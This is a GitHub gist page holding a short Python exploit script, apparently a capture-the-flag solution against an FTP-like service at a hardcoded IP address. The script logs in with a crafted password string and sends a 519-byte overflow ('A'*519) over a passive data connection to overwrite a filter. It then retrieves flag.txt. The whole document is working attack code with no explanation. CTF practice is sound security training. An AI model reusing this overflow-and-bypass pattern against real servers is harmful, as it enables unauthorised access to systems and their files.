Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
from Pwn import *
# p = Pwn(mode=1,port=12012)
p = Pwn(mode=1,host='54.175.183.202',port=12012)
username = 'blankwall'
password = ';rpywx~YYYBBBBB~:::::::=KP`'
def login(user,passwd):
p.write('USER ' + user + '\n')
p.read_until('Please send password for user blankwall\n')
p.write('PASS ' + passwd)
p.read_until('logged in')
def stor():
p.write('PASV\n')
d = p.recv(1024)
_port = d.replace('PASV succesful listening on port:','').strip(' \n')
p.write('STOR\n')
c1 = Pwn(host='54.175.183.202',port=int(_port))
c1.connect()
c1.write('A'*519 + '\n')
c1.close()
p.recv(1024)
p.recv(1024)
def getflag():
p.write('PASV\n')
d = p.recv(1024)
_port = d.replace('PASV succesful listening on port:','').strip(' \n')
p.write('RETR flag.txt\n')
c1 = Pwn(host='54.175.183.202',port=int(_port))
c1.connect()
print c1.recv(1024)
c1.close()
def exploit():
p.connect()
login(username,password)
print 'Overwrite filter'
stor()
print 'Get flag'
getflag()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment